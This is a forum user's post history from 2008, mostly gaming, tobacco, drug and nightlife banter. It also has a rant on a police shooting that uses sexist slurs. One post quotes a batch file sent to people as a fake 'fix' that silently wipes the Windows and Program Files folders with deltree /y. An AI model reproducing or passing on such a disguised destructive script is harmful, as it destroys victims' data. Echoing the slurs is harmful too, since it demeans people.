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» Strik_IX replied on Tue Aug 12, 2008 @ 4:33pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Very nice! I may have gotten the wrong impression though, my daggers suck mucho balls. I'm a mace boy :P PvP 4Life!
» Strik_IX replied on Tue Aug 12, 2008 @ 4:19pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Bah same as a prot pally can be an effective healer... Only idiots go "what spec are you?" If properly geared for the task at hand and you have the skills for the job you can pretty much do any job your class can be assigned. So I wouldnt let a boomkin MT BT, but you know what I mean? Plus, asking the question implies that you are in a pug so really, anything you can pug you can do without proper specs IMO, you just gotta be creative and skilled.
» Strik_IX replied on Tue Aug 12, 2008 @ 4:12pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
If you wanna raid go combat swords its the most steady dps in the entire game. If you wanna PvP go Hemo with slow weapons or Mutilate build. Dont see why you'd go mutilate to raid, heck I get more damage dealt with hemo when I raid than I ever could with a mutilate build.

And now I cant play no more cuz my comp died yesterday... w/smoke and all. New power supply or motherboard for sure... joy.
» Strik_IX replied on Tue Aug 12, 2008 @ 4:03pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Originally Posted By NO_COMPLY
ya, the idea itself was retarded, good bye what little class balance there was lol. Rogues need loving, affliction locks will scare me at 80

Rogues are fine, my main is one and they are fine atm. The new talents are absolutely insane and make me wanna eat gnomies in cloth.

I think death knight is the dumbest idea ever. Wanna introduce a new class? Make it balanced and just like horde pallies and alliance shammies make em start at lvl 1 thus deterring most of the wow population from rerolling the exact same class. Free lvl 55s is just stupid.
» Strik_IX replied on Tue Aug 12, 2008 @ 3:48pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Duh! Blizz and their retarded "hero-class" *whips out nerf bat*
» Strik_IX replied on Tue Aug 12, 2008 @ 2:20pm. Posted in Flavored Tobaco For Sheesha.
Coolness: 89365
Best I had was home made apricot tobacco, it was just sublime.
» Strik_IX replied on Tue Aug 12, 2008 @ 1:33pm. Posted in Worst Drug Documentary.
Coolness: 89365
Oh yeah! It's huge! It dwarves most stamen... most...
» Strik_IX replied on Tue Aug 12, 2008 @ 1:25pm. Posted in Worst Drug Documentary.
Coolness: 89365
Originally Posted By MATTWOOD
The cactus contains a beautiful entity.

So do my pants. I'm serious.
» Strik_IX replied on Tue Aug 12, 2008 @ 1:17pm. Posted in Worst Drug Documentary.
Coolness: 89365
In my pants little boy, why dont you reach in and grab some. ;)
» Strik_IX replied on Tue Aug 12, 2008 @ 1:10pm. Posted in Worst Drug Documentary.
Coolness: 89365
I'll do it for 6000g
» Strik_IX replied on Tue Aug 12, 2008 @ 12:03pm. Posted in What made/ruined your day?.
Coolness: 89365
Mario Galaxy?
» Strik_IX replied on Tue Aug 12, 2008 @ 11:34am. Posted in What made/ruined your day?.
Coolness: 89365
Ruined: Power supply fried yesterday...
» Strik_IX replied on Mon Aug 11, 2008 @ 9:48pm. Posted in Riot Riot Riot Riot.
Coolness: 89365
Yo pisss

» Strik_IX replied on Mon Aug 11, 2008 @ 8:17pm. Posted in Bernie Mac Died.
Coolness: 89365
Originally Posted By PURESEXMEGS
Montreal please stop doing drugs

- the management

O_O Coming from one of the top stoners on this board amirite? :P
» Strik_IX replied on Mon Aug 11, 2008 @ 8:13pm. Posted in Flavored Tobaco For Sheesha.
Coolness: 89365
Originally Posted By ARMANI
Maybe look at the headshops where they sell pipes and all, sometimes they have it. Or once again, the arab markets and cafes are good places. If they don't have any, they'll tell you where to fnd it.

Wouldnt trust head shops for this sort of thing. Go to an arab cafe or market, you'll find plenty. There's quite a few shisha cafes in Montreal as well, but I doubt it will cheap there. Best bet is the arab market, if you like apple flavor you cant go wrong with "La Pomme de Djerba" brand, I've got a carton from Tunisia and it is Grrrrrrreat! Not sure if they sell it here though.
» Strik_IX replied on Mon Aug 11, 2008 @ 6:56pm. Posted in Any tips for quitting weed?.
Coolness: 89365
These people I partied hardcore with and these are the ones that stuck. the oes that really are my friends, bear in mind that I dont do any otehr drugs guys at all. We're all close to 30 if not there yet and have known each other for over a decade, we stuck together through thick and thin and getting rid of them makes absolutely no sense to me.

When I did quit for a couple of months they were all very nice and tried to smoke less or just smoke in another room or whatever. It's called respect. Plus like I said before, I think willpower is the key. I quit cigarettes, im almost @ 8 years now, I think I can do this. But I dont think I wanna do it just yet, I have been tapering my intake though, eventually I will get there.
» Strik_IX replied on Mon Aug 11, 2008 @ 6:51pm. Posted in Flavored Tobaco For Sheesha.
Coolness: 89365
It's much cheaper hahaha! Much Much cheaper, unless we're talking about the 6 pack thing. Individual packs are usually dirt cheap and can be used for 5-6 bowls.
» Strik_IX replied on Mon Aug 11, 2008 @ 4:45pm. Posted in Riot Riot Riot Riot.
Coolness: 89365
I posted this on another board where some dumb fucks were siding with the popo and saying they were trained to shoot to kill if they took out their guns. This whole thing stinks and that cop should get her licensed revoked and be charged with homicide IMO, dumb bitch.

"I believe when police whip out their guns that it's protocol to warn the person they are pointing at. If that person does not comply then they are allowed to shoot. But it is a judgment call by the officer to shoot or not and where. This whole shoot to kill thing is the biggest load of BS i read all day.

If the police force is trained to shoot to kill when they pop their guns out of their holsters then I dont want em policing my neighbourhood, I would almost rather try my luck with street gangs. There is so much room for error and the damage is permanent, there is no going back. Neutral, unbiased and swift judgment is what is required out of a police officer in the field, not a set list of tasks to be done without thinking, such as automatically shooting to kill.

An 18 year old kid, is an 18 year old kid... we have all made errors in the past, you know when we were kids? And yes 18 is still a fucking kid, dont argue and gimme bullshit arguments that when you are 18 you are a man... You are a man when you become a man and that happens at different stages in life depending on your back ground, chances are that at 18 you still dont have enough judgement to qualify. Oh at 18 you will be trialed as an adult, no problem in that, but I think the kid was at the wrong place at the wrong time and he did the wrong move, it is all very coincidental and I feel the police were sloppy at best in dealing with the original issue.

The riots are a whole different ballgame, again the majority's reputation will be tarnished by the actions of a handful of idiots. I would just appreciate it if people wouldnt put everyone involved in the "idiot" bracket. Some people are genuinely pissed off at how sloppy the police were in handling this whole issue and they have right to be out there and protest.

But take for what it is, it's just my opinion."
» Strik_IX replied on Mon Aug 11, 2008 @ 2:52pm. Posted in Girlicious 'Stupid Shit'.
Coolness: 89365
Didnt know this abnd existed, my sister loves em... I think they are stupid bimbos trying to make quick money by being skanks on stage. They suck ass, just like every other girl/boy band.

I wouldnt poke em with a 20 foot pole. I'm sorry but 18 year old skanks just dont do it for me
» Strik_IX replied on Mon Aug 11, 2008 @ 2:48pm. Posted in For Mico....
Coolness: 89365
Indeed it is "...this have severely crippled..."
» Strik_IX replied on Fri Aug 8, 2008 @ 6:16pm. Posted in ka aprenn don lphrenss'haie avan dréponde o comande jpensa sa !.
Coolness: 89365
Or maybe they are just trying to be nice and serve you in your native tongue? These people are making the same effort you are, I see no reason for you to take offense.
» Strik_IX replied on Fri Aug 8, 2008 @ 5:21pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Originally Posted By V.2.0.MINUS.1

Looks like v2-1 has regimental syndrome :P Did you get screwed by my reply while you were editing?

» Strik_IX replied on Fri Aug 8, 2008 @ 5:02pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Originally Posted By SCREWHEAD

Eventually, when we got bored, we'd DCC them a .BAT file to "fix" their problem..

 @echo off
deltree /y c:\windows
deltree /y c:\progra~1

Oh that's evil, you even bypass the "Are you sure?" hahahahaha!
» Strik_IX replied on Fri Aug 8, 2008 @ 4:47pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Alt+F4 I get, what did joining #2000 do? Join some chatroom?
» Strik_IX replied on Fri Aug 8, 2008 @ 4:40pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
I like em all, but the pizza and the wizard robe and hat part 2 are awesome.
» Strik_IX replied on Fri Aug 8, 2008 @ 4:33pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
[ blue-networks.net ]

<3 Bloodninja, I know it's old... probably a repost of a repost of a repost.
» Strik_IX replied on Fri Aug 8, 2008 @ 4:20pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
*Puts on wizard robe and hat*
» Strik_IX replied on Fri Aug 8, 2008 @ 3:15pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Screwhead you busted 200k coolness this week. Gratz! You officially live here :P
» Strik_IX replied on Fri Aug 8, 2008 @ 3:05pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Do we get to see cleavage?
» Strik_IX replied on Fri Aug 8, 2008 @ 3:01pm. Posted in Everyday around 5-6pm rhis board dies a little....
Coolness: 89365
Originally Posted By NO_COMPLY
2:53, we can get through this together.

15:11 im done in 3:24... crap!
» Strik_IX replied on Fri Aug 8, 2008 @ 1:03pm. Posted in Georgia and Russia Go To War...
Coolness: 89365
This is so bad.
» Strik_IX replied on Fri Aug 8, 2008 @ 12:47pm. Posted in Wtf!!!.
Coolness: 89365
Mary Hell is one hell of a promoter too, I cant take that away from her. She has a very successful club night.
» Strik_IX replied on Fri Aug 8, 2008 @ 12:37pm. Posted in Wtf!!!.
Coolness: 89365
Originally Posted By BLISSS
Just for you Strike, guess you didn't get laid last night lol...

[ www.youtube.com ]

Naw, not last night, but I got a girl blisss, how long has it been since YOU've been with someone nistead of desperately trying to get laid? And I cant watch youtube from work... I might remember to click that when I get home, then again I would have to toggle the right reply and probably wont feel like it, seeing as I have other shit to do than dick around on [ rave.ca ] when I get home from work.

Update » Strik_IX wrote on Fri Aug 8, 2008 @ 12:43pm
Axel, to each his own. I really dont expect that sort of music @ Saphir on a Thursday is all. Your mixes were quite good, but that one really turned me off though... Venga Boys ouf.

I did like House of Pain and Rage Against the Machine though, but you lose me with the pop sorry.

And you're right (obviously) it was Killing in the Name of now that I think of it.
» Strik_IX replied on Fri Aug 8, 2008 @ 12:31pm. Posted in Georgia and Russia Go To War...
Coolness: 89365
Weird that Georgia thinks it stands a chance against the millitary might of Russia.
» Strik_IX replied on Fri Aug 8, 2008 @ 12:25pm. Posted in ka aprenn don lphrenss'haie avan dréponde o comande jpensa sa !.
Coolness: 89365
Pffft 9000 is teh magic number. Queue DBZ video w/Vegeta going WHAT NINE THOUSAND!!!!
» Strik_IX replied on Fri Aug 8, 2008 @ 12:20pm. Posted in Wtf!!!.
Coolness: 89365
Originally Posted By GODISDEAD_
Originally Posted By strik_ix
Only works if you're right handed :(

your left handed Pat ?!?!

Only when I get down and dirty :P Seriously though I'm weird... I eat like a lefty, I play hockey like a lefty in fact all sports but golf and baseball I'm a lefty, but I write with my right hand, was kinda forced to do it in grade school.

And for the record, I fed the troll for fun today sorry! I'm not dising the night otehrwise I would not go there at all. I just very much disliked Axel's set, thought it was cheezy to the extremes and one "mix" if you wanna call it a mix just made half the dancefloor flee to the terrasse or just flat out leave. He had an electro version of Bulls on Parade by Rage against the Machine, it got to a peak in a buildup, he cut it flat out and popped the Venga Boys. *pukes*
» Strik_IX replied on Fri Aug 8, 2008 @ 11:59am. Posted in Wtf!!!.
Coolness: 89365
Only works if you're right handed :(
» Strik_IX replied on Fri Aug 8, 2008 @ 11:55am. Posted in Wtf!!!.
Coolness: 89365
Try gold bond... or a bath.
» Strik_IX replied on Fri Aug 8, 2008 @ 11:44am. Posted in Wtf!!!.
Coolness: 89365
Blame it on the rain! Yeaaaaah! Yeaaaahhh!
Blame it on the stars who dont shine at night!
Whatever you do!
Dont put the blame on you!
» Strik_IX replied on Fri Aug 8, 2008 @ 11:42am. Posted in ka aprenn don lphrenss'haie avan dréponde o comande jpensa sa !.
Coolness: 89365

+9000 Just cuz I can.
Strik_IX's Profile - Community Messages